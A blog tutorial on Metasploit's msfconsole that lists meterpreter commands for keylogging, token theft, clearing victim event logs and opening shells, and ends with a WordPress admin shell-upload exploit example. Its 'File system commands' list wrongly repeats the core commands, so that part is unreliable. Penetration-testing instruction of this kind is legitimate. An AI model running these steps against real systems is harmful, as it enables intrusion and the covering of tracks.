i Metasploit (Using msfconsole interface) – All things in moderation

Metasploit (Using msfconsole interface)

1. Introduction


In previous post , I have explained how to install metasploit . This post , I’ll present how to using msfconsole .
So, what is msfconsole ?
The msfconsole is probably the most popular interface to the Metasploit Framework (MSF). It provides an “all-in-one” centralized console and allows you efficient access to virtually all of the options available in the MSF. Msfconsole may seem intimidating at first, but once you learn the syntax of the commands you will learn to appreciate the power of utilizing this interface.

2. MsfConsole Commands


* Core commands

? - help menu  
**background** - moves the current session to the background
bgkill - kills a background meterpreter script
bglist - provides a list of all running background scripts
bgrun - runs a script as a background thread
channel - displays active channels
close - closes a channel
exit - terminates a meterpreter session
help - help menu
interact - interacts with a channel
irb - go into Ruby scripting mode
migrate - moves the active process to a designated PID
quit - terminates the meterpreter session
read - reads the data from a channel
run - executes the meterpreter script designated after it
use - loads a meterpreter extension
write - writes data to a channel
  • File system commands
? - help menu
background - moves the current session to the background
bgkill - kills a background meterpreter script
bglist - provides a list of all running background scripts
bgrun - runs a script as a background thread
channel - displays active channels
close - closes a channel
exit - terminates a meterpreter session
help - help menu
interact - interacts with a channel
irb - go into Ruby scripting mode
migrate - moves the active process to a designated PID
quit - terminates the meterpreter session
read - reads the data from a channel
run - executes the meterpreter script designated after it
use - loads a meterpreter extension
write - writes data to a channel
  • System commands
clearav - clears the event logs on the victim's computer
drop_token - drops a stolen token
execute - executes a command
getpid - gets the current process ID (PID)
getprivs - gets as many privileges as possible
getuid - get the user that the server is running as
kill - terminate the process designated by the PID
ps - list running processes
reboot - reboots the victim computer
reg - interact with the victim's registry
rev2self - calls RevertToSelf() on the victim machine
shell - opens a command shell on the victim machine
shutdown - shuts down the victim's computer
steal_token - attempts to steal the token of a specified (PID) process
sysinfo - gets the details about the victim computer such as OS and name
  • Networking commands
ipconfig - displays network interfaces with key information including IP address, etc.
portfwd - forwards a port on the victim system to a remote service
route - view or modify the victim routing table
  • User Interface commands
enumdesktops - lists all accessible desktops
getdesktop - get the current meterpreter desktop
idletime - checks to see how long since the victim system has been idle
keyscan_dump - dumps the contents of the software keylogger
keyscan_start - starts the software keylogger when associated with a process such as Word or browser
keyscan_stop - stops the software keylogger
screenshot - grabs a screenshot of the meterpreter desktop
set_desktop - changes the meterpreter desktop
uictl - enables control of some of the user interface components
  • Database backend commands
   creds             List all credentials in the database  
    db_connect        Connect to an existing database  
    db_disconnect     Disconnect from the current database instance  
    db_export         Export a file containing the contents of the database  
    db_import         Import a scan result file (filetype will be auto-detected)  
    db_nmap           Executes nmap and records the output automatically  
    db_rebuild_cache  Rebuilds the database-stored module cache  
    db_status         Show the current database status  
    hosts             List all hosts in the database  
    loot              List all loot in the database  
    notes             List all notes in the database  
    services          List all services in the database  
    vulns             List all vulnerabilities in the database  
    workspace         Switch between database workspaces    

3. Using Metasploit( msfconsole) exploit

Search exploit name

use exploit

Using an exploit also adds more options to the ‘show’ command.

Show options

Show targets

Show payloads

Show evation

Show advanced

Exploit example :

use  exploit/unix/webapp/wp_admin_shell_upload
set RHOST http://example.com
set RPORT 80
set TARGETURI /
exploit

Leave a Reply